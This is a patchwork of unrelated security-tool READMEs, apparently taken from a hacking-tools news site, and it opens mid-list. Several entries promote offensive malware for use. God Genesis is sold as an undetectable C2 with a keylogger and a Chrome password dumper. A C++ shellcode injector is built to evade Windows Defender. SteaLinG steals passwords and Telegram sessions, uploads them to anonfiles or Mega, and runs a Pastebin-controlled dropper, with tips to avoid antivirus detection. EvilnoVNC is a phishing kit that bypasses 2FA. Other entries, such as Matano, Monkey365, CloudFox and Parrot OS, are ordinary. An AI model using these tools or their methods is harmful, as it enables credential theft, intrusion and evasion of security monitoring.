- --scope: limits JSubFinder to only analyze responses from www.reddit.com
- -p: the port JSubFinder's proxy server is running on
- -S: silence output to the console/stdout
- -o <file>: output examples to this file

God Genesis is a C2 server purely coded in Python3, created to help Red Teamers and Penetration Testers. Currently it only supports a TCP reverse shell, but wait a minute, it's FUD and can give you an admin shell from any targeted Windows machine.
The List Of Commands It Supports :-
===================================================================================================
BASIC COMMANDS:
===================================================================================================
help --> Show This Options
terminate --> Exit The Shell Completely
exit --> Shell Works In Background And Prompted To C2 Server
clear --> Clear The Previous Outputs
===================================================================================================
SYSTEM COMMANDS:
===================================================================================================
cd --> Change Directory
pwd --> Prints Current Working Directory
mkdir *dir_name* --> Creates A Directory Mentioned
rm *dir_name* --> Deletes A Directory Mentioned
powershell [command] --> Run Powershell Command
start *exe_name* --> Start Any Executable By Giving The Executable Name
===================================================================================================
INFORMATION GATHERING COMMANDS:
===================================================================================================
env --> Checks Environment Variables
sc --> Lists All Services Running
user --> Current User
info --> Gives Us All Information About Compromised System
av --> Lists All antivirus In Compromised System
===================================================================================================
DATA EXFILTRATION COMMANDS:
===================================================================================================
download *file_name* --> Download Files From Compromised System
upload *file_name* --> Uploads Files To Victim Pc
===================================================================================================
EXPLOITATION COMMANDS:
===================================================================================================
persistence1 --> Persistance Via Method 1
persistence2 --> Persistance Via Method 2
get --> Download Files From Any URL
chrome_pass_dump --> Dump All Stored Passwords From Chrome Browser
wifi_password --> Dump Passwords Of All Saved Wifi Networks
keylogger --> Starts Key Logging Via Keylogger
dump_keylogger --> Dump All Logs Done By Keylogger
python_install --> Installs Python In Victim Pc Without UI
Check the video to get detailed knowledge.
1. Payload.py is FULLY UNDETECTABLE (FUD); use your own techniques for making an exe file. (Best results when backdoored with some other legitimate application.)
2. Able to perform privilege escalation on any Windows system.
3. FUD keylogger.
4. Two ways of achieving persistence.
5. Recon automation to save your time.
How To Use Our Tool :
git clone https://github.com/SaumyajeetDas/GodGenesis.git
pip3 install -r requirements.txt
python3 c2c.py
It is worth mentioning that Suman Chakraborty has contributed to the framework by coding the FUD Keylogger, Wifi Password Extraction and Chrome Password Dumper modules.
Don't forget to change the IP address manually in both c2c.py and payload.py.
Matano is an open source security lake platform for AWS. It lets you ingest petabytes of security and log data from various sources, store and query them in an open Apache Iceberg data lake, and create Python detections as code for realtime alerting. Matano is fully serverless and designed specifically for AWS and focuses on enabling high scale, low cost, and zero-ops. Matano deploys fully into your AWS account.
Matano lets you collect log data from sources using S3 or SQS based ingestion.
Matano normalizes and transforms your data using Vector Remap Language (VRL). Matano works with the Elastic Common Schema (ECS) by default and you can define your own schema.
Log data is always stored in S3 object storage, for cost effective, long term, durable storage.
All data is ingested into an Apache Iceberg based data lake, allowing you to perform ACID transactions, time travel, and more on all your log data. Apache Iceberg is an open table format, so you always own your own data, with no vendor lock-in.
Matano is a fully serverless platform, designed for zero-ops and unlimited elastic horizontal scaling.
Write Python detections to implement realtime alerting on your log data.
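To give a flavor of detections as code, here is a minimal sketch of a Python detection that flags failed console logins. The `detect()` entry point and the ECS-style field names are assumptions for illustration; consult the Matano documentation for the actual detection contract.

```python
# Hypothetical Matano-style Python detection that flags failed console
# logins. The detect() entry point and the ECS-like field names are
# assumptions for illustration, not Matano's actual contract.
def detect(record: dict) -> bool:
    event = record.get("event", {})
    return event.get("action") == "ConsoleLogin" and event.get("outcome") == "failure"
```

A detection like this would fire an alert in real time for every matching record ingested into the lake.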
View the complete installation instructions.
You can install the matano CLI to deploy Matano into your AWS account, and manage your Matano deployment.
Matano provides a nightly release on GitHub with the latest prebuilt files for installing the Matano CLI. You can download and execute these files to install Matano.
For example, to install the Matano CLI for Linux, run:
curl -OL https://github.com/matanolabs/matano/releases/download/nightly/matano-linux-x64.sh
chmod +x matano-linux-x64.sh
sudo ./matano-linux-x64.sh
Read the complete docs on getting started.
To get started with Matano, run the matano init
command. Make sure you have AWS credentials in your environment (or in an AWS CLI profile).
The interactive CLI wizard will walk you through getting started by generating an initial Matano directory for you, initializing your AWS account, and deploying Matano into your AWS account.
Initial deployment takes a few minutes.
View our complete documentation.
Another shellcode injection technique using C++ that attempts to bypass Windows Defender using XOR encryption sorcery and UUID strings madness :).
Firstly, generate a payload in binary format (using either CobaltStrike or msfvenom). For instance, in msfvenom, you can do it like so (the payload I'm using is for illustration purposes; you can use whatever payload you want):
msfvenom -p windows/messagebox -f raw -o shellcode.bin
Then convert the shellcode (in binary/raw format) into a UUID string format using the Python3 script bin_to_uuid.py:
./bin_to_uuid.py -p shellcode.bin > uuid.txt
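The conversion itself is just a repacking of bytes. Below is a minimal Python 3 sketch of the idea (the repository's bin_to_uuid.py may differ in details): `bytes_le` is used so that UuidFromStringA, which parses the string with little-endian field ordering, writes the original byte order back to memory.

```python
# Minimal sketch of the bin-to-UUID step: pack each 16-byte chunk of the
# raw shellcode into a UUID string. bytes_le matches the little-endian
# field layout that UuidFromStringA uses when decoding the string back.
import uuid

def shellcode_to_uuids(data: bytes) -> list[str]:
    padded = data + b"\x00" * (-len(data) % 16)  # pad to a 16-byte boundary
    return [str(uuid.UUID(bytes_le=padded[i:i + 16]))
            for i in range(0, len(padded), 16)]
```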
xor-encrypt the UUID strings in uuid.txt using the Python3 script xor_encryptor.py:
./xor_encryptor.py uuid.txt > xor_crypted_out.txt
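A minimal Python 3 sketch of this step follows; the actual xor_encryptor.py output format may differ, and the key value here is just an example:

```python
# Sketch of the XOR step: XOR every byte of the UUID text with a
# single-byte key and emit a C-style unsigned char array that can be
# pasted into the C++ source. KEY is an example value, not the repo's.
KEY = 0x42

def xor_to_c_array(text: str, key: int = KEY) -> str:
    enc = bytes(b ^ key for b in text.encode())
    body = ", ".join(f"0x{b:02x}" for b in enc)
    return f"unsigned char payload[] = {{ {body} }};"
```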
Copy the C-style array in the file xor_crypted_out.txt and paste it into the C++ file as an array of unsigned char, i.e. unsigned char payload[]{your_output_from_xor_crypted_out.txt}.
This shellcode injection technique comprises the following subsequent steps:

- A block of memory is allocated with VirtualAlloc.
- xor decrypts the payload using the xor key value.
- UuidFromStringA converts the UUID strings into their binary representation and stores them in the previously allocated memory. This is used to avoid the usage of suspicious APIs like WriteProcessMemory or memcpy.
- EnumChildWindows executes the payload previously loaded into memory (in step 1).

Instead of using memcpy or WriteProcessMemory, which are known to raise alarms to AVs/EDRs, this program uses the Windows API function called UuidFromStringA, which can be used to decode data as well as write it to memory (Isn't that great folks? And please don't say "NO!" :) ).

To customize the project:

- Change the xor key (row 86) to what you wish. This can be done in the ./xor_encryptor.py Python3 script by changing the KEY variable.
- Change the executable filename value (row 90) to your filename.
- To compile, mingw was used, but you can use whichever compiler you prefer: make
The binary was scanned using antiscan.me on 01/08/2022.
https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/
The SteaLinG is an open-source penetration testing framework designed for social engineering. After the hack, you can upload it to the victim's device and run it.
This is only for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes
module | Short description |
---|---|
Dump password | Steals all saved passwords and uploads the saved-passwords file to Mega |
Dump History | dump browser history |
dump files | Steal files from the hard drive with the extension you want |
module | Short description |
---|---|
1-Telegram Session Hijack | Telegram session hijacker |
C:\Users\<pc name>\AppData\Roaming\Telegram Desktop
in the 'tdata' folder:
C:
└── Users
├── AppData
│ └── Roaming
│ └── TelegramDesktop
│ └── tdata
Once you have moved this folder with all its contents to your device in the same path, the session is hijacked; it is that simple. The tool does all of this; all you have to do is give it your token from the site https://anonfiles.com/
The first step is to go to the path where the tdata folder is located and convert it to a zip file. If Telegram is running this would fail, so on any error the tool kills the Telegram processes first. Killing processes outright looks like malicious behavior to antivirus software, so that part is wrapped in a try/except in the code. The archive file is named after your victim's device, in case you have more than one victim. After that, the tool posts the zip file to the anonfiles website using the API key (token) of your account on the site. Just that, and it is not detected by any AV.
module |
---|
2- Dropper |
You give it the URL of the virus (or whatever you want to download to the victim's device), but keep in mind that the URL must be direct, meaning it must end in .exe or .png; what matters is that the link ends with the file itself. It also takes your Pastebin API key: register on the site, click on the word API and you will find it, then take your username and password. So how does it work?
The first thing it does is create a private paste on the site containing the URL you gave it, and then it gives you the exe file. When the exe runs on any device, it adds itself to the device's registry in two different ways, opens the private paste you created, takes the URL from it, downloads its content and runs it. You can change the URL at any time: the dropper checks the URL every 10 minutes, and if it has changed, it downloads and runs the new content. You literally don't have to do anything, and you can access your device from anywhere.
3- Linux support
4-You can now choose between Mega or Pastebin
git clone https://github.com/De3vil/SteaLinG.git
cd SteaLinG
pip install -r requirements.txt
python SteaLinG.py
git clone https://github.com/De3vil/SteaLinG.git
cd SteaLinG
chmod +x linux_setup.sh
bash linux_setup.sh
python SteaLinG.py
* Don't upload to VirusTotal.com, because this tool will stop working over time.
* VirusTotal shares signatures with AV companies.
* Again, don't be an idiot!
Monkey365 is an Open Source security tool that can be used to easily conduct not only Microsoft 365, but also Azure subscriptions and Azure Active Directory security configuration reviews without the significant overhead of learning tool APIs or complex admin panels from the start. To help with this effort, Monkey365 also provides several ways to identify security gaps in the desired tenant setup and configuration. Monkey365 provides valuable recommendations on how to best configure those settings to get the most out of your Microsoft 365 tenant or Azure subscription.
Monkey365 is a plugin-based PowerShell module that can be used to review the security posture of your cloud environment. With Monkey365 you can scan for potential misconfigurations and security issues in public cloud accounts according to security best practices and compliance standards, across Azure, Azure AD, and Microsoft365 core applications.
You can either download the latest zip by clicking this link or download Monkey365 by cloning the repository:
Once downloaded, you must extract the files to a suitable directory. Once you have unzipped the zip file, you can use the PowerShell V3 Unblock-File cmdlet to unblock the files:
Get-ChildItem -Recurse c:\monkey365 | Unblock-File
Once you have installed the monkey365 module on your system, you will likely want to import the module with the Import-Module cmdlet. Assuming that Monkey365 is located in the PSModulePath
, PowerShell would load monkey365 into active memory:
Import-Module monkey365
If Monkey365 is not located on a PSModulePath
path, you can use an explicit path to import:
Import-Module C:\temp\monkey365
You can also use the Force
parameter in case you want to reimport the Monkey365 module into the same session
Import-Module C:\temp\monkey365 -Force
The following command will provide the list of available command line options:
Get-Help Invoke-Monkey365
To get a list of examples use:
Get-Help Invoke-Monkey365 -Examples
To get a list of all options and examples with detailed info use:
Get-Help Invoke-Monkey365 -Detailed
The following example will retrieve data and metadata from Azure AD and SharePoint Online and then print results. If credentials are not supplied, Monkey365 will prompt for credentials.
$param = @{
Instance = 'Microsoft365';
Analysis = 'SharePointOnline';
PromptBehavior = 'SelectAccount';
IncludeAzureActiveDirectory = $true;
ExportTo = 'PRINT';
}
$assets = Invoke-Monkey365 @param
Monkey365 helps streamline the process of performing not only Microsoft 365, but also Azure subscriptions and Azure Active Directory Security Reviews.
160+ checks covering industry defined security best practices for Microsoft 365, Azure and Azure Active Directory.
Monkey365 will help consultants to assess cloud environment and to analyze the risk factors according to controls and best practices. The report will contain structured data for quick checking and verification of the results.
By default, the HTML report shows you the CIS (Center for Internet Security) Benchmark. The CIS Benchmarks for Azure and Microsoft 365 are guidelines for security and compliance best practices.
The following standards are supported by Monkey365:
More standards will be added in future releases (NIST, HIPAA, GDPR, PCI-DSS, etc.) as they become available.
Additional information such as Installation or advanced usage can be found in the following link
The protocol aims to develop an application-layer abstraction for the Hyper Service Transfer Protocol.
HSTP is recursive by nature. The protocol implements itself as an interface. On every internet-connected device there is an HSTP instance, which is why no adoption is needed: HSTP is already running on top of the internet. We have just now managed to explain the protocol over protocols on heterogeneous networks. That is why it should not be compared with web2, web3 or vice versa.
HSTP is an application representation interface for heterogeneous networks.
The HSTP interface enforces the implementation of a set of methods to be able to communicate with other nodes in the network. Thus servers, clients, and other nodes can communicate with each other in a trust-based, end-to-end encrypted way. Node resolution is based on a fastest-path resolution algorithm I wrote.
Story time!
A small overview
Think about the situation of one mother and one father who live a happy life. They had a baby! Suddenly, the mother needed to take pills regularly to cure a disease. The pill is poison for the baby. The baby is crying, and the mother calls the father, because he is the only trusted person to help the baby. But the father cannot always stay at home; he needs to do something to feed the baby. The father heard that one milkman has fresh, high-quality milk for a low price. The father decides to talk to the milkman; the milkman delivers the milk to the father; the father carries the milk to the mother. The mother gives the milk to the baby. The baby is happy now and sleeps, and the mother sees the baby is happy.
The family has never bought milk from outside; this is the first time they buy milk for the baby. (Mom does not know the milkman's number; the milkman does not know the home address.)
As steps:
0) - Baby wants to drink milk.
1) - Baby cries to the mom.
2) - Mom sees the baby is crying.
3) - Mom checks the fridge. Mom sees the milk is empty. (Mother only trusts the Father)
4) - Mom calls the father.
5) - Father calls the milkman.
6) - Milkman delivers the milk to the father.
7) - Father delivers the milk to the mom.
8) - Mom gives the milk to the baby.
9) - Baby drinks the milk.
10) - Baby is happy.
11) - Baby sleeps.
12) - Mother sees the baby is happy and sleeps.
13) - In order to be able to contact the milkman again, the mother asks the father to tell the milkman to save the address of the house and the mother's mobile phone number.
14) - Mother calls the father.
15) - Father calls the milkman.
16) - Milkman saves the address of the house and the mother's mobile phone number.
Oops, tomorrow baby wakes up and cries again,
0) - Baby wants to drink milk.
1) - Baby cries to the mom.
2) - Mom sees the baby is crying.
3) - Mom checks the fridge. Mom sees the milk is empty. (Mother trusts that the Father made the right decision in the first place by giving the address to the milkman, and that the milkman made the right decision by saving the address of the house and the mother's mobile phone number.)
4) - Mother calls the milkman. (Mother is trusting the Father's decision only)
5) - Milkman delivers the milk to mom.
6) - Mom gives the milk to the baby.
7) - Baby drinks the milk.
8) - Baby is happy.
9) - Baby sleeps.
10) - Mother sees the baby is happy and sleeps.
11) - Mother is happy, and the mother trusts the milkman now.
This document you're reading is a manifest for the people of the internet: connecting people by trusting the service that serves the client. That trust can only be maintained by providing good services. Trust is the key, but it is not enough to survive: the service has to be reliable, consistent, and cheap, or else people will decide not to ask you again.
So, it's easy, right? It's simple to understand. Who are those people in the story?
also,
Baby is in trusted hands. Nothing to worry about. They love you, you will understand when you grow up and have a child.
// Technical step explanation soon, but not that hard as you see.
HSTP is an interface: a set of methods that must be implemented by the application layer. The interface is used to communicate with other nodes in the network and is designed for use in heterogeneous networks.
HSTP can be implemented on any layer of network-connected devices/environments.
An HSTP node could be a TCP server, an HTTP server, a static file, or a contract on any chain. One HSTP node is able to call any other HSTP node. Thus the nodes can call each other freely, check each other's system status, and communicate with each other.
HSTP is already implemented at the language level, by people for people. English is the most widely adopted language on Earth; JavaScript may be the most widely adopted language for browser environments; Solidity is for EVM-based chains, hyperbees for TCP-based networks, etc.
HSTP interface shall be applied between any HSTP connected devices/networks.
Infinite scaling options: Any TCP-connected device can talk with any other TCP-connected device over HSTP. That means any web browser can serve as another HSTP node, and any web browser can call any other web browser.
Uniform application representation interface: HSTP is a uniform interface, which is a set of methods that must be implemented by the application layer.
Heterogeneous networks: Any participant of the network can share resources with other participants. The resources can be CPU, memory, storage, network, etc.
Conjugation of web versions: Since blockchain technologies came to be called web3, people started discussing the differences between the webs. Comparing is a mindset from an incremental numeric system education. Which one is better? None of them. We have to build systems that can talk in one uniform protocol; the services underneath could be anything. HSTP is aiming for that.
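To make the uniform interface concrete, here is an illustrative, non-normative Python sketch of an HSTP node: it exposes query/mutation, can register children, and bubbles unresolved routes up to its parent, mirroring the reply semantics of the Solidity example later in this document. All names here are assumptions for illustration.

```python
# Illustrative-only sketch of the HSTP uniform interface. The class and
# method names mirror the Solidity example in this document; nothing
# here is a normative specification.
from abc import ABC, abstractmethod

class HSTPNode(ABC):
    def __init__(self, parent: "HSTPNode | None" = None):
        self.parent = parent
        self.routes: dict = {}

    def register(self, name: str, node: "HSTPNode") -> None:
        # Children can be added at any time as sub-services.
        self.routes[name] = node

    def reply(self, name: str, operation: str, payload: bytes):
        # Serve from a registered child when the route is known,
        # otherwise traverse upwards and ask the parent node.
        if name in self.routes:
            node = self.routes[name]
            return node.query(payload) if operation == "query" else node.mutation(payload)
        if self.parent is not None:
            return self.parent.reply(name, operation, payload)
        raise LookupError(f"no route for {name!r}")

    @abstractmethod
    def query(self, payload: bytes): ...

    @abstractmethod
    def mutation(self, payload: bytes): ...
```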
Registry interface: The registry interface is designed for use on the TCP layer, to be able to register top-level tld nodes in the network. The first implementation of the HSTP TCP relay will resolve hstp/
The registry has two parts of the interface:
A registry implementation needs two HSTP nodes,
Router interface
For demonstration purposes, we will use the following solidity example:
// SPDX-License-Identifier: GNU-3.0-or-later
pragma solidity ^0.8.0;
import "./HSTP.sol";
import "./ERC165.sol";
enum Operation {
Query,
Mutation
}
struct Response {
uint256 status;
string body;
}
struct Registry {
HSTP resolver;
}
// HSTP/Router.sol
abstract contract Router is ERC165 {
event Log(address indexed sender, Operation operation, bytes payload);
event Register(address indexed sender, Registry registry);
mapping(string => Registry) public routes;
function reply(string memory name, Operation _operation, bytes memory payload) public virtual payable returns(Response memory response) {
emit Log(msg.sender, _operation, payload);
// Traverse upwards and downwards of the tree.
// Tries to find the closest path for given operation.
// If the route is registered on HSTP node, reply from children node.
// If the node do not have the route on this node, ask for parent.
if (address(routes[name].resolver) != address(0)) {
if (_operation == Operation.Query) {
return this.query(name, payload);
} else if (_operation == Operation.Mutation) {
return this.mutation(name, payload);
}
}
return super.reply(name, _operation, payload);
}
function query(string memory name, bytes memory payload) public view returns (Response memory) {
return routes[name].resolver.query(payload);
}
function mutation(string memory name, bytes memory payload) public payable returns (Response memory) {
return routes[name].resolver.mutation(payload);
}
function register(string memory name, HSTP node) public {
Registry memory registry = Registry({
resolver: node
});
emit Register(msg.sender, registry);
routes[name] = registry;
}
function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
return interfaceId == type(HSTP).interfaceId;
}
}
HSTP interface
// SPDX-License-Identifier: GNU-3.0-or-later
pragma solidity ^0.8.0;
import "./Router.sol";
// Stateless Hyper Service Transfer Protocol for on-chain services.
// Will implement: EIP-4337 when it's on final stage.
// https://github.com/ethereum/EIPs/blob/master/EIPS/eip-4337.md
abstract contract HSTP is Router {
constructor(string memory name) {
register(name, this);
}
function query(bytes memory payload)
public
view
virtual
returns (Response memory);
function mutation(bytes memory payload)
public
payable
virtual
returns (Response memory);
}
Example HSTP Node
HSTP node has access to call parent router by super.reply(name, operation, payload) method. HSTP node can also call children nodes by calling this.query(payload) or this.mutation(payload) methods.
A HSTP node can be a smart contract, or a web browser, or a TCP connected device.
Node has full capability of adding more HSTP nodes to the network or itself as sub services.
HSTP HSTP
/ \ / \
HSTP HSTP HSTP
/ \
HSTP HSTP
/ /
HSTP HSTP
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.0;
import "hstp/HSTP.sol";
// Stateless Hyper Service Transfer Protocol for on-chain services.
contract Todo is HSTP("Todo") {
struct ITodo {
string todo;
}
function addTodo(ITodo memory request) public payable returns(Response memory response) {
response.body = request.todo;
return response;
}
// Override for HSTP.
function query(bytes memory payload)
public
view
virtual
override
returns (Response memory) {}
function mutation(bytes memory payload)
public
payable
virtual
override
returns (Response memory) {
(ITodo memory request) = abi.decode(payload, (ITodo));
return this.addTodo(request);
}
}
The Ethereum proposal is a draft for now, but the protocol has a reference implementation, Todo.sol.
You can test HSTP and try it on Remix now.
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.0;
import "hstp/HSTP.sol";
// Stateless Hyper Service Transfer Protocol for on-chain services.
contract Todo is HSTP("Todo") {
struct TodoRequest {
string todo;
}
function addTodo(TodoRequest memory request) public payable returns(Response memory response) {
response.body = request.todo;
return response;
}
// Override for HSTP.
function query(bytes memory payload)
public
view
virtual
override
returns (Response memory) {}
function mutation(bytes memory payload)
public
payable
virtual
override
returns (Response memory) {
(TodoRequest memory todoRequest) = abi.decode(payload, (TodoRequest));
return this.addTodo(todoRequest);
}
}
GNU GENERAL PUBLIC LICENSE V3
EvilnoVNC is a Ready to go Phishing Platform.
Unlike other phishing techniques, EvilnoVNC allows 2FA bypassing by using a real browser over a noVNC connection.
In addition, this tool allows us to see in real time all of the victim's actions, access to their downloaded files and the entire browser profile, including cookies, saved passwords, browsing history and much more.
It's recommended to clone the complete repository or download the zip file.
Additionally, it's necessary to build Docker manually. You can do this by running the following commands:
git clone https://github.com/JoelGMSec/EvilnoVNC
cd EvilnoVNC ; sudo chown -R 103 Downloads
sudo docker build -t joelgmsec/evilnovnc .
./start.sh -h
_____ _ _ __ ___ _ ____
| ____|_ _(_) |_ __ __\ \ / / \ | |/ ___|
| _| \ \ / / | | '_ \ / _ \ \ / /| \| | |
| |___ \ V /| | | | | | (_) \ V / | |\ | |___
|_____| \_/ |_|_|_| |_|\___/ \_/ |_| \_|\____|
---------------- by @JoelGMSec --------------
Usage: ./start.sh $resolution $url
Examples:
1280x720 16bits: ./start.sh 1280x720x16 http://example.com
1280x720 24bits: ./start.sh 1280x720x24 http://example.com
1920x1080 16bits: ./start.sh 1920x1080x16 http://example.com
1920x1080 24bits: ./start.sh 1920x1080x24 http://example.com
https://darkbyte.net/robando-sesiones-y-bypasseando-2fa-con-evilnovnc
This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.
Original idea by @mrd0x: https://mrd0x.com/bypass-2fa-using-novnc
This tool has been created and designed from scratch by Joel Gámez Molina // @JoelGMSec
This software does not offer any kind of guarantee. Its use is exclusively for educational environments and/or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.
For more information, you can find me on Twitter as @JoelGMSec and on my blog darkbyte.net.
AoratosWin is a tool that removes traces of executed applications on Windows OS which can easily be listed with tools such as ExecutedProgramList by Nirsoft.
(Feel free to decompile, reverse, redistribute, etc.)
Any actions and/or activities related to this tool are solely your responsibility.
CloudFox helps you gain situational awareness in unfamiliar cloud environments. It’s an open source command line tool created to help penetration testers and other offensive security professionals find exploitable attack paths in cloud infrastructure.
CloudFox is modular (you can run one command at a time), but there is an aws all-checks
command that will run the other aws commands for you with sane defaults:
cloudfox aws --profile [profile-name] all-checks
CloudFox is designed to be executed by a principal with limited read-only permissions, but its purpose is to help you find attack paths that can be exploited in simulated compromise scenarios (aka objective-based penetration testing).
For the full documentation please refer to our wiki.
Provider | CloudFox Commands |
---|---|
AWS | 15 |
Azure | 2 (alpha) |
GCP | Support Planned |
Kubernetes | Support Planned |
Option 1: Download the latest binary release for your platform.
Option 2: Install Go, clone the CloudFox repository and compile from source
# git clone https://github.com/BishopFox/cloudfox.git
...omitted for brevity...
# cd ./cloudfox
# go build .
# ./cloudfox
SecurityAudit + CloudFox custom policy
Additional policy notes (as of 09/2022):
Policy | Notes |
---|---|
CloudFox custom policy | Has a complete list of every permission cloudfox uses and nothing else |
arn:aws:iam::aws:policy/SecurityAudit | Covers most cloudfox checks but is missing newer services or permissions like apprunner:*, grafana:*, lambda:GetFunctionURL, lightsail:GetContainerServices |
arn:aws:iam::aws:policy/job-function/ViewOnlyAccess | Covers most cloudfox checks but is missing newer services or permissions like AppRunner:*, grafana:*, lambda:GetFunctionURL, lightsail:GetContainerServices - and is also missing iam:SimulatePrincipalPolicy. |
arn:aws:iam::aws:policy/ReadOnlyAccess | Only missing AppRunner, but also grants things like "s3:Get*" which can be overly permissive. |
arn:aws:iam::aws:policy/AdministratorAccess | This will work just fine with CloudFox, but if you were handed this level of access as a penetration tester, that should probably be a finding in itself :) |
Provider | Command Name | Description |
---|---|---|
AWS | all-checks | Run all of the other commands using reasonable defaults. You'll still want to check out the non-default options of each command, but this is a great place to start. |
AWS | access-keys | Lists active access keys for all users. Useful for cross referencing a key you found with which in-scope account it belongs to. |
AWS | buckets | Lists the buckets in the account and gives you handy commands for inspecting them further. |
AWS | ecr | List the most recently pushed image URI from all repositories. Use the loot file to pull selected images down with docker/nerdctl for inspection. |
AWS | endpoints | Enumerates endpoints from various services. Scan these endpoints from both an internal and external position to look for things that don't require authentication, are misconfigured, etc. |
AWS | env-vars | Grabs the environment variables from services that have them (App Runner, ECS, Lambda, Lightsail containers, and Sagemaker are supported). If you find a sensitive secret, use cloudfox iam-simulator AND pmapper to see who has access to them. |
AWS | filesystems | Enumerate the EFS and FSx filesystems that you might be able to mount without creds (if you have the right network access). For example, this is useful when you have ec2:RunInstances but not iam:PassRole. |
AWS | iam-simulator | Like pmapper, but uses the IAM policy simulator. It uses AWS's evaluation logic, but notably, it doesn't consider transitive access via privesc, which is why you should always also use pmapper. |
AWS | instances | Enumerates useful information for EC2 Instances in all regions like name, public/private IPs, and instance profiles. Generates loot files you can feed to nmap and other tools for service enumeration. |
AWS | inventory | Gain a rough understanding of the size of the account and preferred regions. |
AWS | outbound-assumed-roles | List the roles that have been assumed by principals in this account. This is an excellent way to find outbound attack paths that lead into other accounts. |
AWS | permissions | Enumerates IAM permissions associated with all users and roles. Grep this output to figure out what permissions a particular principal has rather than logging into the AWS console and painstakingly expanding each policy attached to the principal you are investigating. |
AWS | principals | Enumerates IAM users and Roles so you have the data at your fingertips. |
AWS | role-trusts | Enumerates IAM role trust policies so you can look for overly permissive role trusts or find roles that trust a specific service. |
AWS | route53 | Enumerate all records from all route53 managed zones. Use this for application and service enumeration. |
AWS | secrets | List secrets from SecretsManager and SSM. Look for interesting secrets in the list and then see who has access to them using cloudfox iam-simulator and/or pmapper. |
Azure | instances-map | Enumerates useful information for Compute instances in all available resource groups and subscriptions |
Azure | rbac-map | Enumerates Role Assignments for all tenants |
How does CloudFox compare with ScoutSuite, Prowler, Steampipe's AWS Compliance Module, AWS Security Hub, etc.?
CloudFox doesn't create any alerts or findings, and doesn't check your environment for compliance with a baseline or benchmark. Instead, it simply enables you to be more efficient during your manual penetration testing activities. It gives you the information you'll likely need to validate whether an attack path is possible or not.
Why do I see errors in some CloudFox commands?
You can always look in the ~/.cloudfox/cloudfox-error.log file to get more information on errors.
Areas of ongoing work include:

- the endpoints command
- the iam-simulator command
- the permissions command
- --userdata functionality in the instances command, the permissions command, and many others
- the inventory command, and just generally CloudFox as a whole

Parrot OS 5.1 is officially released. We're proud to say that the new version of Parrot OS 5.1 is available for download; this new version includes a lot of improvements and updates that make the distribution more performant and more secure.
You can download Parrot OS by clicking here and, as always, we invite you to never trust third-party and unofficial sources.
If you need any help or in case the direct downloads don't work for you, we also provide official Torrent files, which can circumvent firewalls and network restrictions in most cases.
First of all, we always suggest updating your system to make sure it is stable and functional. You can upgrade an existing system via APT using one of the following commands:
sudo parrot-upgrade
or
sudo apt update && sudo apt full-upgrade
Even if we recommend always updating your version, it is also recommended to do a backup and re-install the latest version to have a cleaner and more reliable user experience, especially if you upgrade from a very old version of Parrot.
You can find all the info about the new Kernel 5.18 by clicking on this link.
Our docker offering has been revamped! We now provide our dedicated parrot.run image registry along with the default docker.io one.
All our images are now natively multiarch, and support amd64 and arm64 architectures.
Our containers offering was updated as well, and we are committed to further improve it.
Run docker run --rm -ti --network host -v $PWD/work:/work parrot.run/core
and give our containers a try without having to install the system, or visit our Docker images page to explore the other containers we offer.
Several packages were updated and backported, like the new Golang 1.19 or LibreOffice 7.4. This is part of our commitment to provide the latest version of the most important software while keeping a stable LTS release model.
To make sure to have all the latest packages installed from our backports channel, use the following commands:
sudo apt update
sudo apt full-upgrade -t parrot-backports
The system has received important updates to some of its key packages, like parrot-menu, which now provides additional launchers for our newly imported tools, and parrot-core, which now provides a new Firefox profile with improved security hardening, plus some minor bugfixes to our zshrc configuration.
As mentioned earlier, our Firefox profile has received a major update that significantly improves the overall privacy and security.
Our bookmarks collection has been revamped, and now includes new resources, including OSINT services, new learning sources and other useful resources for hackers, developers, students and security researchers.
We have also stepped up our effort to avoid Mozilla telemetry and brought DuckDuckGo back as the default search engine, while we explore other alternatives for the future.
Most of our tools have received major version updates, especially our reverse engineering tools, like rizin and rizin-cutter.
Important updates involved metasploit, exploitdb and other popular tools as well.
The new AnonSurf 4 represents a major upgrade for our popular anonymity tool.
AnonSurf is our in-house anonymity solution that routes all system traffic through Tor automatically, without having to set up proxy settings for each individual program, preventing traffic leaks in most cases.
The new version provides significant fixes and reliability updates, fully supports Debian systems without the old resolvconf setup, has a new user interface with an improved system tray icon and settings dialog, and offers a better overall user experience.
Our IoT version now implements significant performance improvements for the various Raspberry Pi boards, and finally includes Wi-Fi support for the Raspberry Pi 400 board.
The Parrot IoT offering has also been expanded, and it now offers Home and Security editions as well, with a full MATE desktop environment exactly like the desktop counterpart.
Our popular Architect Edition now implements some minor bugfixes and is more reliable than ever.
The Architect Edition is a special edition of Parrot that enables the user to install a barebone Parrot Core system, and then offers a selection of additional modules to further customize the system.
You can use Parrot Architect to install other desktop environments like KDE, GNOME or XFCE, or to install a specific selection of tools.
The Architect Edition is also used internally by the Parrot Engineering Team to install Parrot Server Edition on all the servers that power our infrastructure, which is officially 100% powered by Parrot and Kubernetes.
This is a major change in the way we handle our infrastructure, which enables us to implement better autoscaling, easier management, smaller attack surface and an overall better network, with the improved scalability and security we were looking for.
Arsenal is a simple Bash shell script that installs the most important tools and requirements for your environment, saving you the time of installing them all one by one.
Name | Description |
---|---|
Amass | The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques |
ffuf | A fast web fuzzer written in Go |
dnsX | Fast and multi-purpose DNS toolkit that allows running multiple DNS queries |
meg | meg is a tool for fetching lots of URLs but still being 'nice' to servers |
gf | A wrapper around grep to avoid typing common patterns |
XnLinkFinder | This is a tool used to discover endpoints crawling a target |
httpX | httpx is a fast and multi-purpose HTTP toolkit that allows running multiple probes using the retryablehttp library; it is designed to maintain result reliability with increased threads |
Gobuster | Gobuster is a tool used to brute-force DNS subdomains, open Amazon S3 buckets and web content |
Nuclei | Nuclei is a Golang-based tool used to send requests across multiple targets based on nuclei templates, leading to zero false positives or irrelevant results, and provides fast scanning across various hosts |
Subfinder | Subfinder is a subdomain discovery tool that discovers valid subdomains for websites by using passive online sources. It has a simple modular architecture and is optimized for speed. subfinder is built for doing one thing only - passive subdomain enumeration, and it does that very well |
